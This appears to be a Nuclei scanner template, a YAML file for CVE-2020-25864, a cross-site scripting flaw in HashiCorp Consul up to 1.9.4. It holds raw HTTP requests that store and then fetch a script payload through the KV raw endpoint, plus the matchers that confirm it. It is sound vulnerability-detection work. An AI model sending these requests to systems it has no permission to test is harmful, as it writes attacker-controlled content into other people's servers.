58 lines
2.0 KiB
YAML
58 lines
2.0 KiB
YAML
id: CVE-2020-25864
|
|
|
|
info:
|
|
name: HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting
|
|
author: c-sh0
|
|
severity: medium
|
|
description: |
|
|
HashiCorp Consul and Consul Enterprise up to version 1.9.4 are vulnerable to cross-site scripting via the key-value (KV) raw mode.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Consul/Consul Enterprise application.
|
|
remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14.
|
|
reference:
|
|
- https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368
|
|
- https://www.hashicorp.com/blog/category/consul
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-25864
|
|
- https://security.gentoo.org/glsa/202208-09
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-25864
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00324
|
|
epss-percentile: 0.67732
|
|
cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: hashicorp
|
|
product: consul
|
|
tags: cve,cve2020,consul,xss,intrusive,hashicorp
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
<!DOCTYPE html><script>alert(document.domain)</script>
|
|
- |
|
|
GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- <!DOCTYPE html><script>alert(document.domain)</script>
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402200fa51c35e379e04cfc217136ea63345795a9a0bf46b475d2f559c68e39373fa90220510749bf0c9313fd9c5bea25d50826a3fa6ea66c24c0b7f66b59fa6be4fc9281:922c64590222798bb761d5b6d8e72950 |